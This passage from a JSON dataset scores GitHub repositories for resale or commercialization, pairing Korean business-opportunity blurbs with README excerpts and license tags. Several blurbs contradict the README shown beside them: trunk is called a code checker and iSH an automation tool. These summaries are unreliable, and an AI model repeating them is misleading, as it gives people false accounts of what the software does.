프로그램으로, 프로그래머나 작가가 복잡한 설정 없이 바로 업무를 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 코딩 교육 플랫폼에서 학생들이 브라우저로 직접 코드를 작성하고 실행하는 환경\n2. **내부 업무 도구**: 대량의 텍스","readme_excerpt":"# Lite XL\n\n[![CI]](https://github.com/lite-xl/lite-xl/actions/workflows/build.yml)\n[![Discord Badge Image]](https://discord.gg/UQKnzBhY5H)\n\n![screenshot-dark]\n\nA lightweight text editor written in Lua, adapted from [lite].\n\n* **[Get Lite XL]** — Download for Windows, Linux and Mac OS.\n* **[Get plugins]** — Add additional functionality, adapted for Lite XL.\n* **[Get color themes]** — Add additional colors themes.\n\nPlease refer to our [website] for the user and developer documentation,\nincluding [build] instructions details. A quick build guide is described below.\n\nLite XL has support for high DPI display on Windows and Linux and,\nsince 1.16.7 release, it supports **retina displays** on macOS.\n\nPlease note that Lite XL is compatible with lite for most plugins and all color themes.\nWe provide a separate lite-xl-plugins repository for Lite XL, because in some cases\nsome adaptations may be needed to make them work better with Lite XL.\nThe repository with modified plugins is https://github.c","composite_score":0.0573,"license_safety_tag":"safe"},{"name":"rubensousa/RecyclerViewSnap","github_url":"https://github.com/rubensousa/RecyclerViewSnap","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":3,"description":"# RecyclerViewSnap 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 목록을 스크롤할 때 자동으로 정렬되는 기능을 제공하여, 사용자 경험을 크게 개선할 수 있는 개발자용 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **앱 개발 교육 플랫폼**: 초급 개발자용 강좌 \"모바일 앱 UI 개선 완전 가이드\"에 샘플 코드로 포함시켜 판매\n2. **기업","readme_excerpt":"# GravitySnapHelper\n\nA SnapHelper that snaps a RecyclerView to an edge.\n\n## Setup\n\n```kotlin\nimplementation(\"com.github.rubensousa:gravitysnaphelper:2.3.0\")\n```\n\n## How to use\n\nYou can either create a GravitySnapHelper, or use GravitySnapRecyclerView.\n\nIf you want to use GravitySnapHelper directly, \nyou just need to create it and attach it to your RecyclerView:\n\n```kotlin\nval snapHelper = GravitySnapHelper(Gravity.START)\nsnapHelper.attachToRecyclerView(recyclerView)\n```\n\nIf you want to use GravitySnapRecyclerView, you can use the following xml attributes for customisation:\n\n```xml\n<attr name=\"snapGravity\" format=\"enum\">\n<attr name=\"snapEnabled\" format=\"boolean\" />\n<attr name=\"snapLastItem\" format=\"boolean\" />\n<attr name=\"snapToPadding\" format=\"boolean\" />\n<attr name=\"snapScrollMsPerInch\" format=\"float\" />\n<attr name=\"snapMaxFlingSizeFraction\" format=\"float\" />\n```\n\nExample:\n\n```xml\n<com.github.rubensousa.gravitysnaphelper.GravitySnapRecyclerView\n    android:id=\"@+id/recyclerView\"\n    a","composite_score":0.0573,"license_safety_tag":"safe"},{"name":"DefiLlama/defillama-server","github_url":"https://github.com/DefiLlama/defillama-server","stars":229,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0571,"license_safety_tag":"unknown"},{"name":"Siva-Chidambaram12/kalshi-trading-bot","github_url":"https://github.com/Siva-Chidambaram12/kalshi-trading-bot","stars":152,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0571,"license_safety_tag":"unknown"},{"name":"JetBrains/compose-jb","github_url":"https://github.com/JetBrains/compose-jb","stars":25,"language":"Kotlin","license":"Apache-2.0","abandonment_months":0,"description":"# Compose for Desktop 사업성 분석\n\n## 왜 보물인가\nJetBrains(개발 도구의 유명 회사)가 만든 크로스플랫폼 앱 개발 기술로, Windows/Mac/Linux에서 동일한 코드로 프로그램을 만들 수 있어 개발 비용을 획기적으로 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 회사가 웹 대신 ","readme_excerpt":"[![official project](http://jb.gg/badges/official.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub)\n[![stable](https://img.shields.io/github/v/release/JetBrains/compose-multiplatform?sort=semver&display_name=release&label=stable&color=brightgreen)](https://github.com/JetBrains/compose-multiplatform/releases/latest)\n[![prerelease](https://img.shields.io/github/v/release/JetBrains/compose-multiplatform?include_prereleases&sort=semver&filter=*-*&display_name=release&label=prerelease&color=blue)](https://github.com/JetBrains/compose-multiplatform/releases)\n[![dev](https://img.shields.io/github/v/tag/JetBrains/compose-multiplatform?include_prereleases&sort=semver&filter=v*%2Bdev*&label=dev&color=orange)](https://github.com/JetBrains/compose-multiplatform/tags)\n\n<a href=\"https://jb.gg/cmp\">\n    <picture>\n        <source srcset=\"artwork/compose-logo-name-white.svg\"  width=\"400\" media=\"(prefers-color-scheme: dark)\">\n        <img src=\"artwork/compose-logo-name-black.svg\" a","composite_score":0.0571,"license_safety_tag":"safe"},{"name":"google/model-viewer","github_url":"https://github.com/google/model-viewer","stars":5,"language":"TypeScript","license":"apache-2.0","abandonment_months":1,"description":"# google/model-viewer 분석 보고서\n\n## 왜 보물인가\n3D 모델을 웹사이트나 앱에서 쉽게 보여줄 수 있도록 만들어주는 구글의 기술로, 온라인 쇼핑이나 건축 시뮬레이션 등 다양한 분야에서 고객 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 가구/패션 전자상거래 SaaS**\n온라인 쇼핑몰에서 고객이 구매 전에 3D로","readme_excerpt":"# The `<model-viewer>` project\n\nThis is the main GitHub repository for the `<model-viewer>` web component and\nall of its related projects.\n\n**Getting started?** Check out the [`<model-viewer>`](packages/model-viewer) project!\n\nThe repository is organized into sub-directories containing the various projects.\nCheck out the README.md files for specific projects to get more details:\n\n👩‍🚀 **[`<model-viewer>`](packages/model-viewer)** • The `<model-viewer>` web component (probably what you are looking for)\n\n✨ **[`<model-viewer-effects>`](packages/model-viewer-effects)** • The PostProcessing plugin for `<model-viewer>`\n\n🌐 **[modelviewer.dev](packages/modelviewer.dev)** • The source for the `<model-viewer>` documentation website\n\n🖼 **[render-fidelity-tools](packages/render-fidelity-tools)** • Tools for testing how well `<model-viewer>` renders models\n\n🎨 **[shared-assets](packages/shared-assets)** • 3D models, environment maps and other assets shared across many sub-projects\n\n🚀 **[space-opera](","composite_score":0.057,"license_safety_tag":"safe"},{"name":"vis2k/Mirror","github_url":"https://github.com/vis2k/Mirror","stars":6,"language":"C#","license":"MIT","abandonment_months":1,"description":"# Mirror 저장소 평가\n\n## 왜 보물인가\n온라인 멀티플레이 게임을 만들기 위한 기본 도구 모음으로, 게임 개발자들이 처음부터 시작할 필요 없이 검증된 기반을 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 플랫폼 SaaS**: 인디 게임 개발자들을 위한 구독형 온라인 게임 제작 도구 서비스\n2. **게임사 내부 업무 도구**: 게","readme_excerpt":"![Mirror Logo](https://user-images.githubusercontent.com/16416509/119120944-6db26780-ba5f-11eb-9cdd-fc8500207f4d.png)\n<p align=\"center\">\n<a href=\"https://assetstore.unity.com/packages/tools/network/mirror-129321\"><img src=\"https://img.shields.io/badge/download-brightgreen.svg?style=for-the-badge&logo=unity&colorA=363a4f&colorB=f5a97f\" alt=\"Download\"></a>\n<a href=\"https://github.com/MirrorNetworking/Mirror#made-with-mirror\"><img src=\"https://img.shields.io/badge/showcase-brightgreen.svg?style=for-the-badge&logo=github&colorA=363a4f&colorB=f5a97f\" alt=\"Showcase\"></a>\n<a href=\"https://mirror-networking.gitbook.io/\"><img src=\"https://img.shields.io/badge/docs-brightgreen.svg?style=for-the-badge&logo=gitbook&logoColor=white&colorA=363a4f&colorB=f5a97f\" alt=\"Documentation\"></a>\n<a href=\"https://forum.unity.com/threads/mirror-networking-for-unity-aka-hlapi-community-edition.425437/\"><img src=\"https://img.shields.io/badge/forum-brightgreen.svg?style=for-the-badge&logo=unity&colorA=363a4f&color","composite_score":0.057,"license_safety_tag":"safe"},{"name":"OrchardCMS/Orchard","github_url":"https://github.com/OrchardCMS/Orchard","stars":8,"language":"C#","license":"bsd-3-clause","abandonment_months":0,"description":"# Orchard CMS 상용화 분석\n\n## 왜 보물인가\n웹사이트를 만들고 운영하는 것을 누구나 쉽게 할 수 있도록 도와주는 오픈소스 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 자신의 웹사이트를 직접 만들고 관리할 수 있는 '노코드 웹사이트 빌더' 구독 서비스\n2. **내부 업무 도구**: 중소 회사의 홍보팀이 자체 웹","readme_excerpt":"# Orchard\n\nOrchard is a free, open source, community-focused Content Management System built on the ASP.NET MVC platform. You are looking at Orchard 1, the older, .NET Framework-based version that has been in development since 2009.\n\nIf you're starting a new project (or maintaining a project built on Orchard 1), you should check out [Orchard Core](https://github.com/OrchardCMS/OrchardCore), the new generation of Orchard built on ASP.NET Core. You can also try it for free on [DotNest.com](https://dotnest.com)!\n\nJoin the community discussion on [Discord](https://orchardcore.net/discord), where we also have a [channel dedicated to Orchard 1](https://discord.com/channels/551136772243980291/551137194689953848).\n\n## About The Orchard Project\n\n#### Please visit our website at https://orchardcore.net for the most current information about this project.\n\nOrchard is built on a modern architecture that puts extensibility up-front as its number one concern. All components in Orchard can be replace","composite_score":0.0568,"license_safety_tag":"safe"},{"name":"sorayuki/obs-multi-rtmp","github_url":"https://github.com/sorayuki/obs-multi-rtmp","stars":7,"language":"C++","license":"GPL-2.0","abandonment_months":2,"description":"# obs-multi-rtmp 저장소 분석\n\n## 왜 보물인가\n여러 개의 동영상 플랫폼에 동시에 방송을 내보낼 수 있는 도구로, 유튜브와 트위치 등 여러 채널에 동시 송출이 필요한 크리에이터들의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 라이브 스트리밍 플랫폼 SaaS**\n- 개인 크리에이터와 소규모 스튜디오를 위한 구독형 ","readme_excerpt":"# [Homepage / 主页](https://sorayuki.github.io/obs-multi-rtmp)\n\n## 为什么首页是日语？ / Why is the homepage in Japanese?\n\n因为最初是做给管人用的。\n\nBecause it's originally made for virtual Youtubers (VTubers).\n\n# 声明 \n\n近日发现百度贴吧有个叫 maggot 的用户在售卖此插件。咸鱼上也有，没得救了。 \n\n本插件免费使用，作者不收取费用。 \n\n举报之后百度贴吧找我要软件著作权证明，累不爱。 \n\n\n# Announcement\n\nThis plugin is provided for free, without a fee. \n\nRecently a Baidu Tieba account 'maggot' is selling this plugin. Please, don't buy it.\n\n\n# お知らせ\n\n本プラグインは無償で提供されるものです。\n\n最近、Baidu Tiebaに「maggot」というアカウント名のユーザーがこのプラグインを販売する行為をしています。\n\n決して購入はしないでください。\n\n\n# Donate\n\n如果你觉得这个工具很有用想要捐赠，这里是链接。注意：这不是提需求的渠道。\n\nこのツールの開発に支援もとい投げ銭をしたいと思った方は以下のリンクからお願いします。(機能のリクエストは受け付けていません)\n\nIf you find this tool useful and want to doante, here is the link. (Please do not donate for feature requests.)\n\n## [paypal / 贝宝](https://paypal.me/sorayuki0)\n\n## alipay / 支付宝\n\n![alipay](./docs/zhi.png) \n\n## wechat / 微信\n![wechat](./docs/wechat.jpg)\n\n## Build\n\nThis project uses obs-plugintemplate.   \nPlease refer to obs-plugintemplate to u","composite_score":0.0566,"license_safety_tag":"restricted"},{"name":"thedodd/trunk","github_url":"https://github.com/thedodd/trunk","stars":6,"language":"Rust","license":"Apache-2.0","abandonment_months":2,"description":"# trunk 저장소 분석\n\n## 왜 보물인가\n코드 품질을 자동으로 검사하고 개선하는 도구로, 소프트웨어 개발 팀이 버그를 미리 찾아낼 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 팀을 위한 클라우드 기반 코드 검사 서비스로 월 구독료 청구\n2. **내부 업무 도구**: 회사의 개발팀이 자체 서버에 설치하여 모든 코드","readme_excerpt":"# Trunk\n\n[![Build Status](https://github.com/trunk-rs/trunk/actions/workflows/ci.yaml/badge.svg)](https://github.com/trunk-rs/trunk/actions)\n[![](https://img.shields.io/crates/v/trunk.svg?color=brightgreen&style=flat-square)](https://crates.io/crates/trunk)\n[![](https://img.shields.io/badge/license-MIT%2FApache--2.0-blue?style=flat-square)](#License)\n[![Discord Chat](https://img.shields.io/discord/793890238267260958?logo=discord&style=flat-square)](https://discord.gg/JEPdBujTDr)\n[![](https://img.shields.io/crates/d/trunk?label=downloads%20%28crates.io%29&style=flat-square)](https://crates.io/crates/trunk)\n[![](https://img.shields.io/github/downloads/trunk-rs/trunk/total?label=downloads%20%28GH%29&style=flat-square)](https://github.com/trunk-rs/trunk/releases)\n![](https://img.shields.io/homebrew/installs/dy/trunk?color=brightgreen&label=downloads%20%28brew%29&style=flat-square)\n\n**Build, bundle & ship your Rust WASM application to the web.**\n<br/>\n*”Pack your things, we’re going on an a","composite_score":0.0566,"license_safety_tag":"safe"},{"name":"aimeos/aimeos-laravel","github_url":"https://github.com/aimeos/aimeos-laravel","stars":5,"language":"PHP","license":"mit","abandonment_months":1,"description":"# Aimeos Laravel 저장소 분석\n\n## 왜 보물인가\n온라인 쇼핑몰을 만들 수 있는 완성된 기반 시스템으로, 처음부터 다시 만들 필요 없이 빠르게 전자상거래 사업을 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소상공인을 위한 \"간편한 온라인 쇼핑몰 구축 플랫폼\" 구독 서비스로 월 수수료 수집\n2. **내부 업무 도","readme_excerpt":"<a href=\"https://aimeos.org/\">\n    <img src=\"https://aimeos.org/fileadmin/template/icons/logo.png\" alt=\"Aimeos logo\" title=\"Aimeos\" align=\"right\" height=\"60\" />\n</a>\n\n# Aimeos Laravel ecommerce package\n[![Total Downloads](https://poser.pugx.org/aimeos/aimeos-laravel/d/total.svg)](https://packagist.org/packages/aimeos/aimeos-laravel)\n[![Build Status](https://circleci.com/gh/aimeos/aimeos-laravel.svg?style=shield)](https://circleci.com/gh/aimeos/aimeos-laravel)\n[![Coverage Status](https://coveralls.io/repos/aimeos/aimeos-laravel/badge.svg?branch=master&service=github)](https://coveralls.io/github/aimeos/aimeos-laravel?branch=master)\n[![Scrutinizer Code Quality](https://scrutinizer-ci.com/g/aimeos/aimeos-laravel/badges/quality-score.png?b=master)](https://scrutinizer-ci.com/g/aimeos/aimeos-laravel/?branch=master)\n[![License](https://poser.pugx.org/aimeos/aimeos/license.svg)](https://packagist.org/packages/aimeos/aimeos)\n\n:star: Star us on GitHub — it motivates us a lot! 😀\n\n[Aimeos](https:","composite_score":0.0562,"license_safety_tag":"safe"},{"name":"ardalis/ApiEndpoints","github_url":"https://github.com/ardalis/ApiEndpoints","stars":6,"language":"C#","license":"MIT","abandonment_months":3,"description":"# ApiEndpoints 상용화 분석\n\n## 왜 보물인가\n웹 서비스를 만드는 개발자들이 반복적으로 작성하는 보일러플레이트 코드를 획기적으로 줄여주는 프레임워크입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객 데이터를 처리하는 클라우드 기반 회계 소프트웨어나 마케팅 자동화 플랫폼의 백엔드 구축\n2. **내부 업무 도구**: 대기업의 ","readme_excerpt":"[![dotnet core - build](https://github.com/ardalis/ApiEndpoints/workflows/dotnet%20core%20-%20build/badge.svg)](https://github.com/ardalis/ApiEndpoints/actions?query=workflow%3A%22dotnet+core+-+build%22) \n[![Nuget](https://img.shields.io/nuget/v/Ardalis.ApiEndpoints)](https://www.nuget.org/packages/Ardalis.ApiEndpoints/)\n[![Nuget](https://img.shields.io/nuget/dt/Ardalis.ApiEndpoints)](https://www.nuget.org/packages/Ardalis.ApiEndpoints/)\n\n<a href=\"https://twitter.com/intent/follow?screen_name=ardalis\">\n    <img src=\"https://img.shields.io/twitter/follow/ardalis.svg?label=Follow%20@ardalis\" alt=\"Follow @ardalis\" />\n</a> &nbsp; <a href=\"https://twitter.com/intent/follow?screen_name=nimblepros\">\n    <img src=\"https://img.shields.io/twitter/follow/nimblepros.svg?label=Follow%20@nimblepros\" alt=\"Follow @nimblepros\" />\n</a>\n\n# ASP.NET Core API Endpoints\n\nA project for supporting API Endpoints in ASP.NET Core web applications.\n\n## Fast Endpoints\n\nIf you're on .NET 6 or later (if you're no lon","composite_score":0.056,"license_safety_tag":"safe"},{"name":"tbodt/ish","github_url":"https://github.com/tbodt/ish","stars":5,"language":"C","license":"NOASSERTION","abandonment_months":0,"description":"# tbodt/ish 저장소 분석\n\n## 왜 보물인가\n개발자들이 복잡한 코딩 없이 자동화된 작업을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업이 자신의 업무를 자동화하는 클라우드 기반 플랫폼으로 월 구독료 수금\n- **내부 업무 도구**: 회사 직원들이 반복적인 데이터 처리나 보고서 작성을 자동으로 처리하도록","readme_excerpt":"# [iSH](https://ish.app)\n\n[![Build Status](https://github.com/ish-app/ish/actions/workflows/ci.yml/badge.svg)](https://github.com/ish-app/ish/actions)\n[![goto counter](https://img.shields.io/github/search/ish-app/ish/goto.svg)](https://github.com/ish-app/ish/search?q=goto)\n[![fuck counter](https://img.shields.io/github/search/ish-app/ish/fuck.svg)](https://github.com/ish-app/ish/search?q=fuck)\n[![shit counter](https://img.shields.io/github/search/ish-app/ish/shit.svg)](https://github.com/ish-app/ish/search?q=shit)\n\n<p align=\"center\">\n<a href=\"https://ish.app\">\n<img src=\"https://ish.app/assets/github-readme.png\">\n</a>\n</p>\n\nA project to get a Linux shell running on iOS, using usermode x86 emulation and syscall translation.\n\nFor the current status of the project, check the issues tab, and the commit logs.\n\n- [App Store page](https://apps.apple.com/us/app/ish-shell/id1436902243)\n- [TestFlight beta](https://testflight.apple.com/join/97i7KM8O)\n- [Discord server](https://discord.gg/HFAXj44)\n","composite_score":0.0559,"license_safety_tag":"unknown"},{"name":"spring-projects/spring-authorization-server","github_url":"https://github.com/spring-projects/spring-authorization-server","stars":12,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Spring Authorization Server 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자 로그인과 권한 관리를 안전하게 처리해주는 신뢰할 수 있는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 회사의 직원들이 하나의 클라우드 시스템에 접속할 때 각 직원의 신원을 확인하고 접근 권한을 관리\n2. **내부 업무 도구","readme_excerpt":"= Spring Authorization Server image:https://badges.gitter.im/Join%20Chat.svg[Gitter,link=https://gitter.im/spring-projects/spring-security?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge] image:https://github.com/spring-projects/spring-authorization-server/actions/workflows/continuous-integration-workflow.yml/badge.svg[\"Build Status\", link=\"https://github.com/spring-projects/spring-authorization-server/actions/workflows/continuous-integration-workflow.yml\"] image:https://img.shields.io/badge/Revved%20up%20by-Develocity-06A0CE?logo=Gradle&labelColor=02303A[\"Revved up by Develocity\", link=\"https://ge.spring.io/scans?&search.rootProjectNames=spring-authorization-server\"]\n\n== NOTICE:\n\nSpring Authorization Server has https://spring.io/blog/2025/09/11/spring-authorization-server-moving-to-spring-security-7-0[moved to Spring Security 7.0].\n\nThe *1.5.x* branch is the last generation of Spring Authorization Server. See the OSS and Enterprise https://spring.io/projects/","composite_score":0.0558,"license_safety_tag":"safe"},{"name":"doctrine/dbal","github_url":"https://github.com/doctrine/dbal","stars":5,"language":"PHP","license":"mit","abandonment_months":0,"description":"# Doctrine DBAL 상용화 분석\n\n## 왜 보물인가\n다양한 데이터베이스를 마치 하나인 것처럼 관리해주는 중간 계층으로, 복잡한 데이터 관리를 단순하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객별로 다른 데이터베이스를 사용하는 다중 테넌트 서비스 플랫폼\n2. **내부 업무 도구**: 여러 회사 시스템이 다른 데이터베","readme_excerpt":"# Doctrine DBAL\n\n|                   [5.0-dev][5.0]                    |                   [4.5-dev][4.5]                    |                     [4.4][4.4]                      |                     [3.10][3.10]                      |\n|:---------------------------------------------------:|:---------------------------------------------------:|:---------------------------------------------------:|:-----------------------------------------------------:|\n|      [![GitHub Actions][GA 5.0 image]][GA 5.0]      |      [![GitHub Actions][GA 4.5 image]][GA 4.5]      |      [![GitHub Actions][GA 4.4 image]][GA 4.4]      |      [![GitHub Actions][GA 3.10 image]][GA 3.10]      |\n| [![Code Coverage][Coverage 5.0 image]][CodeCov 5.0] | [![Code Coverage][Coverage 4.5 image]][CodeCov 4.5] | [![Code Coverage][Coverage 4.4 image]][CodeCov 4.4] | [![Code Coverage][Coverage 3.10 image]][CodeCov 3.10] |\n\nPowerful ***D***ata***B***ase ***A***bstraction ***L***ayer with many features for database schema int","composite_score":0.0558,"license_safety_tag":"safe"},{"name":"oceanbase/obproxy","github_url":"https://github.com/oceanbase/obproxy","stars":42,"language":"C++","license":"NOASSERTION","abandonment_months":3,"description":"# OceanBase OBProxy 상용화 분석\n\n## 왜 보물인가\n대규모 데이터베이스를 빠르고 안정적으로 관리하려는 기업들이 반드시 필요로 하는 '데이터 교통 정리' 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 고객의 데이터베이스를 한 곳에서 관리하는 클라우드 서비스 제공 시 핵심 인프라로 활용\n2. **내부 업무 도구**","readme_excerpt":"# OceanBase Database Proxy\n\nTODO: some badges here\n\nOceanBase Database Proxy (ODP for short) is a dedicated proxy server for OceanBase Database. OceanBase Database stores its user data in multiple copies on different OBServers. ODP receives the SQL requests from the users, transfers the SQL requests to the target OBServer, then returns the execution results to the users.\n\n## Quick start\n\nRefer to the Get Started guide [link TODO] to try out ODP.\n\n## Documentation\n\n- English [link TODO]\n- Simplified Chinese (简体中文) [link TODO]\n\n## Licencing\n\nODP is under [MulanPubL - 2.0](https://license.coscl.org.cn/MulanPubL-2.0/index.html) licence. You can freely copy and use the source code. When you modify or distribute the source code, please obey the MulanPubL - 1.0 licence.\n\n## Contributing\n\nContributions are warmly welcomed and greatly appreciated. Here are a few ways you can contribute:\n\n- Raise us an issue [link TODO].\n- Submit Pull Requests. For details, see [How to contribute](CONTRIBUTING.m","composite_score":0.0557,"license_safety_tag":"unknown"},{"name":"an-tao/drogon","github_url":"https://github.com/an-tao/drogon","stars":8,"language":"C++","license":"MIT","abandonment_months":0,"description":"# an-tao/drogon 상용화 분석\n\n## 왜 보물인가\n웹 서비스를 만드는 데 필요한 기본 도구 모음으로, 복잡한 기술 없이도 온라인 서비스를 빠르게 구축할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업을 위한 프로젝트 관리 도구, 재무 관리 클라우드 서비스 등을 빠르게 개발하여 운영\n2. **내부 업무 도구*","readme_excerpt":"![](https://github.com/an-tao/drogon/wiki/images/drogon-white17.jpg)\n\n[![Build Status](https://github.com/drogonframework/drogon/actions/workflows/cmake.yml/badge.svg?branch=master)](https://github.com/drogonframework/drogon/actions)\n[![Conan Center](https://img.shields.io/conan/v/drogon)](https://conan.io/center/recipes/drogon)\n[![Join the telegram group at https://t.me/joinchat/_mMNGv0748ZkMDAx](https://img.shields.io/badge/Telegram-2CA5E0?style=flat&logo=telegram&logoColor=white)](https://t.me/joinchat/_mMNGv0748ZkMDAx)\n[![Join our Discord](https://dcbadge.vercel.app/api/server/3DvHY6Ewuj?style=flat)](https://discord.gg/3DvHY6Ewuj)\n[![Docker image](https://img.shields.io/badge/Docker-image-blue.svg)](https://cloud.docker.com/u/drogonframework/repository/docker/drogonframework/drogon)\n\nEnglish | [简体中文](./README.zh-CN.md) | [繁體中文](./README.zh-TW.md)\n### Overview\n**Drogon** is a C++17/20 based HTTP application framework. Drogon can be used to easily build various types of web applicati","composite_score":0.0557,"license_safety_tag":"safe"},{"name":"lltcggie/waifu2x-caffe","github_url":"https://github.com/lltcggie/waifu2x-caffe","stars":5,"language":"C++","license":"mit","abandonment_months":2,"description":"# waifu2x-caffe 사업화 분석\n\n## 왜 보물인가\n낡고 흐릿한 사진이나 영상을 깨끗하고 선명하게 만들어주는 기술로, 사진 보정 비용을 대폭 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사진 자동 복원 웹사이트 운영 (구글 포토 경쟁)\n- **내부 업무 도구**: 부동산 중개업소나 경매사들의 오래된 건물 사진 복원 ","readme_excerpt":"waifu2x-caffe (for Windows)\n----------\n\n 制作者 : lltcggie\n\n本ソフトは、画像変換ソフトウェア「[waifu2x](https://github.com/nagadomi/waifu2x)」の変換機能のみを、\n[Caffe](http://caffe.berkeleyvision.org/)を用いて書き直し、Windows向けにビルドしたソフトです。\nCPUで変換することも出来ますが、CUDA(あるいはcuDNN)を使うとCPUより高速に変換することが出来ます。\n\nGUI supports English, Japanese, Simplified Chinese, Traditional Chinese, Korean, Turkish, Spanish, Russian, and French.\n\nソフトのダウンロードは[こちらのreleasesページ](https://github.com/lltcggie/waifu2x-caffe/releases)の「Downloads」の項で出来ます。\n\n\n 要求環境\n----------\n\nこのソフトを動作させるには最低でも以下の環境が必要です。\n\n * OS : Windows Vista以降 64bit (32bit用exeはありません)\n * メモリ : 空きメモリ1GB以上 (ただし、変換する画像サイズによる)\n * GPU : Compute Capability 3.5 以上のNVIDIA製GPU(CPUで変換する場合は不要)\n * Microsoft Visual C++ 2015 再頒布可能パッケージ Update 3(x64版)がインストールされていること(必須)\n    - 上記パッケージは[こちら](https://www.microsoft.com/ja-jp/download/details.aspx?id=53587)\n    - `ダウンロード` ボタンを押した後、`vcredist_x64.exe`を選択し、ダウンロード・インストールを行って下さい。\n    - 見つからない場合は、「Visual C++ 2015 再頒布可能パッケージ Update 3」で検索してみて下さい。\n\n自分のGPUのCompute Capabilityが知","composite_score":0.0557,"license_safety_tag":"safe"},{"name":"Wasabi1234/Java-Interview-Tutorial","github_url":"https://github.com/Wasabi1234/Java-Interview-Tutorial","stars":8,"language":"Shell","license":"Apache-2.0","abandonment_months":2,"description":"# Java-Interview-Tutorial 분석 보고서\n\n## 왜 보물인가\n자바 프로그래밍 입사시험 준비 자료를 체계적으로 정리해놓은 학습 가이드로, 취업을 준비하는 사람들이 필요로 하는 핵심 내용을 한곳에서 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 교육 SaaS 플랫폼**\n개발자 취업 준비 과정의 핵심 커리큘럼으로 활용하여 유료","readme_excerpt":"# 编程严选网\n\n## 0 本地启动项目\n1. 安装Node.js\n2. 下载依赖：npm install\n3. 启动服务： npm run dev -- --port 8081\n\nhttps://www.bilibili.com/video/BV1vb411m7NY\n\n视频前两节即可学会本地启动 Vuepress项目，还可学到其他相关配置。\n\n## 1 图片调整路径\ndocs/.vuepress/public/images 存储网站本身展示所需宣传营销图片。\n\n文章中的绘图不建议存储源文件，请直接使用阿里云 oos 对象存储来存储图片或者白嫖使用 CSDN 的博客图床\n\n## 2 提交文章\n\n### 2.1 新增 md 文件（必须）\n\n在 md 目录新建 concurrency 目录，新建00-Java并发编程.md文件，将文章内容放进去\n\n### 2.2 修改 config.js\n\n#### 2.2.1 配置\n\n- 专栏名称（新增专栏时必须）\n- 文章路径（新增文章非必须）\n```js\n{\n    text: '并发编程',\n    items: [\n        {text: '00-Java并发编程', link: '/md/concurrency/00-Java并发编程.md'},\n    ]\n},\n```\n#### 2.2.2 配置专栏侧边导航栏（必须）\n如\n```js\n\"/md/concurrency/\": [\n    {\n        title: \"并发编程\",\n        collapsable: false,\n        sidebarDepth: 0,\n        children: [\n            \"00-Java并发编程.md\"\n        ]\n    }\n],\n```\n\n注意，该步骤不要带有（）、【】、空格等特殊字符！！！\n文章标题是可以有空格的，不然也就没法正常断句了！\n### 2.3 本地调试\n浏览器前端能正常看到文章，即可提交代码\n\n## 3 Git GUI 工具\n建议下载 Github Desktop，可视化提交文章相关数据。\n注意本仓库分为 master、main两个分支，只在 main 分支操作文章，勿碰 master 分支！\n\n## FAQ\n文章名称不要带有括号、#等特色字符\n\n文章内容不要","composite_score":0.0555,"license_safety_tag":"safe"},{"name":"elazarl/goproxy","github_url":"https://github.com/elazarl/goproxy","stars":7,"language":"Go","license":"bsd-3-clause","abandonment_months":1,"description":"# elazarl/goproxy 가치 평가\n\n## 왜 보물인가\n인터넷 트래픽을 중간에서 가로채고 제어할 수 있는 기술로, 기업의 네트워크 보안 감시나 웹 서비스 테스트에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 네트워크 모니터링 SaaS**: 회사 직원들의 인터넷 사용 현황을 실시간으로 감시하고 보안 위협을 차단하는 클라우드 서비스\n","readme_excerpt":"# GoProxy\n\n![Status](https://github.com/elazarl/goproxy/workflows/Go/badge.svg)\n[![GoDoc](https://pkg.go.dev/badge/github.com/elazarl/goproxy)](https://pkg.go.dev/github.com/elazarl/goproxy)\n[![Go Report](https://goreportcard.com/badge/github.com/elazarl/goproxy)](https://goreportcard.com/report/github.com/elazarl/goproxy)\n[![BSD-3 License](https://img.shields.io/badge/License-BSD%203--Clause-orange.svg)](https://opensource.org/licenses/BSD-3-Clause)\n[![Pull Requests](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](https://makeapullrequest.com)\n[![Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go?tab=readme-ov-file#networking)\n\nGoProxy is a library to create a `customized` HTTP/HTTPS `proxy server` using\nGo (aka Golang), with several configurable settings available.\nThe target of this project is to offer an `optimized` proxy server, usable with\nreasonable amount of traffic, yet `customizable` and `programmable`.\n\nThe","composite_score":0.0553,"license_safety_tag":"safe"},{"name":"CreditTone/hooker","github_url":"https://github.com/CreditTone/hooker","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":1,"description":"# 